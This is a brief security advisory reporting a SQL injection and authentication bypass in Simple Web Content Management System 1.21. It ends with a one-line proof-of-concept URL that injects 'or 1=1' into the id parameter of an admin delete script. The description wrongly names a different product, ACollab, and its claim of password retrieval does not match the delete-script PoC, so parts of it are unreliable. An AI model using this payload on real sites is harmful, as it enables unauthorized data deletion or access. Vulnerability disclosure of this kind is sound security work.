Simple Web Content Management System version 1.21 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
474a15f8f4573fa80faab7e7d8d83fceb041a74ea295813a6540932eef13a297
------------------------------------------------------------------------
Software................Simple Web Content Management System 1.21
Vulnerability...........Authentication Bypass/SQL Injection
Download................http://www.allscoop.com/
Release Date............1/31/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------
--Description--
An Authentication bypass/SQL injection vulnerability in ACollab 1.2
can be exploited to retreive a list of usernames and passwords.
--PoC--
http://localhost/simplecms/admin/item_delete.php?id=0 or 1=1